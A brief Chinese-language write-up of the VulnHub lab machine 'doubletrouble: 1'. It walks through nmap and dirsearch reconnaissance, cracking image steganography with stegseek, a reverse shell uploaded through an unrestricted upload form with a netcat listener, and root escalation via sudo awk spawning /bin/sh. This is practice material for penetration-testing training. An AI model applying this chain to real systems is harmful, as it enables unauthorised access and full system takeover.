靶机介绍
虚拟机链接:doubletrouble: 1 ~ VulnHub
参考博客:DoubleTrouble - HackMyVM - Vulnhub - Writeup - Security
开始练习
本机ip:192.168.56.102
目的机ip:192.168.56.122
netdiscover -r 192.168.56.0/24
nmap -A 192.168.56.122
开放80和22端口,访问web页面,同时使用dirsearch枚举目录
# dirsearch -e txt,bak,zip,img,jpg,php,html,js -u http://192.168.56.122
访问目录,认为secret中发现的命名特殊的图片,和install目录较为可疑,但是下载图片后不知道怎么利用,参考博客后,了解使用stegseek暴力破解了图片隐写
stegseek /root/Desktop/doubletrouble.jpg /root/Desktop/rockyou.txt -xf output
cat output
将获得的用户名密码输入web页面,成功登入后台
在任意创建项目,用户头像等处的文件上传都没有格式限制,任选一处上传反弹shell,在之前扫描到的目录中uploads目录下访问
先开启监听端口,访问文件,成功反弹shell
nc -nvlp 4396
查看可以免密root运行的文件,发现可以利用awk提权
sudo -l
按照参考资料执行如下payload,成功提权获得rootshell
sudo awk 'BEGIN {system("/bin/sh")}'